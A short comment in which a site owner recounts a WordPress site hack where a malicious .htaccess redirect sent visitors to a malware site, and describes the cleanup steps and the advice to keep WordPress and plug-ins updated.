I actually had this happen to www.genesiscommunications.biz this week, i found that a conditional redirect was added to the .htaccess file. This conditional redirect was sending traffic to a malware site in Russia. This could have resulted in Google flagging our site as a source of malware. I removed the .htaccess file and it appeared again in a few moments. I then upgraded wordpress to the latest version, upgraded the plug-ins. Then i removed any components i was no longer using to avoid further points on entry to the server. (SugarCRM, Joomla and others were installed on the virtual server and i wasn’t using them actively.) After taking these steps i restored a copy of the site from a backup that was taken after the last changes to the site to ensure no rouge entries were left. So far so good.
Here is an article with a similar issue where code is injected into the page and the end result is a fake-av type threat that apparently can install without user action.
http://www.networkworld.com/news/2012/030612-30000-wordpress-blogs-infected-to-256993.html
The lesson learned is to make sure you regularly update your WordPress and exercise caution when selecting plug-ins.